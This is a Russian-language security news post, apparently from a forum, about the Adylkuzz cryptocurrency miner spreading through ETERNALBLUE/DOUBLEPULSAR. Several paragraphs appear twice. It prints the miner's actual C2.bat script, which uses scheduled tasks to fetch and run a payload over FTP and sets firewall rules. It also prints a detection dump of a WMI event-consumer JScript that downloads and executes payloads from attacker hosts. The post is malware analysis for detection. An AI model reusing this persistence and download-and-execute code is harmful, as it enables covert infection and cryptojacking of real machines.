Майнеры криптовалют используют EternalBlue/DoublePulsar
Как оказалось, шифровальщик WannaCry (он же Wana Decrypt0r, WCry, WannaCrypt0r и WannaCrypt) был отнюдь не единственной малварью, которая эксплуатировала уязвимость в SMB и использовала похищенные у АНБ эксплоиты ETERNALBLUE и DOUBLEPULSAR.
Специалисты компании Proofpoint обнаружили криптовалютный майнер Adylkuzz, который преимущественно занимается майнингом валюты Monero. По данным специалистов, малварь использует точно такой же механизм распространения, как и WannaCry: сканирует SMB-порты, применяет эксплоит ETERNALBLUE и заражает уязвимые системы без ведома пользователей, задействовав DOUBLEPULSAR.
Более того, исследователи уверены, что вредоносная кампания Adylkuzz стартовала гораздо раньше WannaCry, как минимум 2 мая 2017 года, а возможно даже раньше – 24 апреля 2017 года. Adylkuzz не привлек к себе так много внимания, как нашумевший шифровальщик, по той простой причине, что заметить заражение в этом случае гораздо сложнее. Единственные «симптомы», на которые может обратить внимание пострадавший, это замедление работы ПК, так как майнер оттягивает на себя ресурсы системы.
Специалисты отмечают, что Adylkuzz в некотором роде защитил пострадавших от него пользователей от атак WannaCry.
Дело в том, что заразив систему, майнер закрывает «дырку» в SMB и не позволяет другой малвари воспользоваться брешью.
пример кода вC2.bat:
Для загрузки майнера криптовалют злоумышленники использовали скрипт (VBS или PowerShell), добавленный в базу, и запускаемый через инструментарий WMI.
Дмитрий Кузнецов, автор Universal Virus Sniffer в новом выпуске uVS 4.0 добавил функцию обнаружения вредоносных скриптов, заражающих систему майнером через обработчики событий WMI:
Специалисты компании Proofpoint обнаружили криптовалютный майнер Adylkuzz, который преимущественно занимается майнингом валюты Monero. По данным специалистов, малварь использует точно такой же механизм распространения, как и WannaCry: сканирует SMB-порты, применяет эксплоит ETERNALBLUE и заражает уязвимые системы без ведома пользователей, задействовав DOUBLEPULSAR.
Более того, исследователи уверены, что вредоносная кампания Adylkuzz стартовала гораздо раньше WannaCry, как минимум 2 мая 2017 года, а возможно даже раньше – 24 апреля 2017 года. Adylkuzz не привлек к себе так много внимания, как нашумевший шифровальщик, по той простой причине, что заметить заражение в этом случае гораздо сложнее. Единственные «симптомы», на которые может обратить внимание пострадавший, это замедление работы ПК, так как майнер оттягивает на себя ресурсы системы.
Специалисты отмечают, что Adylkuzz в некотором роде защитил пострадавших от него пользователей от атак WannaCry.
https://xakep.ru/2017/05/17/more-attacks-on-smb/
https://www.bleepingcomputer.com/news/security/adylkuzz-cryptocurrency-miner-may-have-saved-you-from-the-wannacry-ransomware/
https://www.proofpoint.com/us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar
https://www.bleepingcomputer.com/news/security/adylkuzz-cryptocurrency-miner-may-have-saved-you-from-the-wannacry-ransomware/
https://www.proofpoint.com/us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar
Дело в том, что заразив систему, майнер закрывает «дырку» в SMB и не позволяет другой малвари воспользоваться брешью.
пример кода вC2.bat:
ping 127.0.0.1 -n 10
net1 user IISUSER$ /del&net1 user IUSR_Servs /del
cacls c:\windows\twain_32\csrss.exe /e /d system&cacls c:\windows\twain_32\csrss.exe /e /d everyone&del c:\windows\twain_32\*.*
schtasks /create /tn "Mysa1" /tr "rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa" /ru "system" /sc onstart /F
schtasks /create /tn "Mysa2" /tr "cmd /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p" /ru "system" /sc onstart /F
netsh ipsec static add policy name=win
netsh ipsec static add filterlist name=Allowlist
netsh ipsec static add filterlist name=denylist
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
netsh ipsec static add filteraction name=Allow action=permit
netsh ipsec static add filteraction name=deny action=block
netsh ipsec static add rule name=deny1 policy=win filterlist=denylist filteraction=deny
netsh ipsec static set policy name=win assign=y
ver | find "5.1." > NUL && sc config SharedAccess start= auto && net start SharedAccess && netsh firewall set opmode mode=enable && netsh firewall set portopening protocol = ALL port = 445 name = 445 mode = DISABLE scope = ALL profile = ALL
@Wmic Process Where "Name='winlogon.exe' And ExecutablePath='C:\Windows\system\winlogon.exe'" Call Terminate &del C:\Windows\system\winlogon.exe
@Wmic Process Where "Name='svchost.exe' And ExecutablePath='C:\Windows\system\svchost.exe'" Call Terminate &del C:\Windows\system\svchost.exe
@Wmic Process Where "Name='svchost.exe' And ExecutablePath='C:\Windows\twain_32\svchost.exe'" Call Terminate &del C:\Windows\twain_32\svchost.exe
@Wmic Process Where "Name='csrss.exe' And ExecutablePath='C:\Windows\twain_32\csrss.exe'" Call Terminate &del C:\Windows\twain_32\csrss.exe
@Wmic Process Where "Name='csrss.exe' And ExecutablePath='C:\Windows\tasks\csrss.exe'" Call Terminate &del C:\Windows\tasks\csrss.exe
del C:\WINDOWS\Debug\c2.bat
exit
Дмитрий Кузнецов, автор Universal Virus Sniffer в новом выпуске uVS 4.0 добавил функцию обнаружения вредоносных скриптов, заражающих систему майнером через обработчики событий WMI:
Полное имя WMI_ACTIVESCRIPTEVENTCONSUMER\FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
Имя файла FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
Тек. статус ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске
Удовлетворяет критериям
WMI_ACTIVESCRIPTEVENTCONSUMER(CONSUMER_NAME ~ FUCKYOUMM2_CONSUMER)(1) [delall (0)]
Сохраненная информация на момент создания образа
Статус в автозапуске
Namespace \\.\root\subscription
Consumer_Name fuckyoumm2_consumer
Consumer_Class ActiveScriptEventConsumer
Consumer_ScriptingEngine Jscript
Consumer_ScriptText var toff=3000;var url1 = "][ттп://wmi.mykings.top:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");for (i = 0; i < arr.length; i++) { t = arr[i].split(" "); proc = t[0]; path = t[1]; dele = t[2]; wsh.Run("taskkill /f /im " + proc, 0, true);if (dele == 0) { try { fso.DeleteFile(path, true); } catch (e) {} } };var locator=new ActiveXObject("WbemScripting.SWbemLocator");var service=locator.ConnectServer(".","root/cimv2");var colItems=service.ExecQuery("select * from Win32_Process");var e=new Enumerator(colItems);var t1=new Date().valueOf();for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption=="rundll32.exe")p.Terminate()};var t2=0;while(t2-t1<toff){var t2=new Date().valueOf()}var pp=service.get("Win32_Process");var url="][ттп://wmi.mykings.top:8888/test.html",http=new ActiveXObject("Microsoft.XMLHTTP"),ado=new ActiveXObject("ADODB.Stream"),wsh=new ActiveXObject("WScript.Shell");for(http.open("GET",url,!1),http.send(),str=http.responseText,arr=str.split("\r\n"),i=0;arr.length>i;i++)t=arr[i].split(" ",3),http.open("GET",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);pp.create("regsvr32 /s shell32.dll");pp.create("regsvr32 /s WSHom.Ocx");pp.create("regsvr32 /s scrrun.dll");pp.create("regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll");pp.create("regsvr32 /s jscript.dll");pp.create("regsvr32 /u /s /i:][ттп://js.mykings.top:280/v.sct scrobj.dll");pp.create("rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa");
Filter_Name fuckyoumm2_filter
Filter_Class __EventFilter
Filter_Query select * from __timerevent where timerid="fuckyoumm2_itimer"
#MOF_Bind#
instance of __FilterToConsumerBinding
{
Consumer = "\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name=\"fuckyoumm2_consumer\"";
Filter = "\\\\.\\root\\subscription:__EventFilter.Name=\"fuckyoumm2_filter\"";
};
#MOF_Event#
instance of __EventFilter
{
Name = "fuckyoumm2_filter";
Query = "select * from __timerevent where timerid=\"fuckyoumm2_itimer\"";
QueryLanguage = "wql";
};
Тэги темы:
Войдите или Зарегистрируйтесь чтобы комментировать.
Комментарии
bleepingcomputer.com
blog.trendmicro.com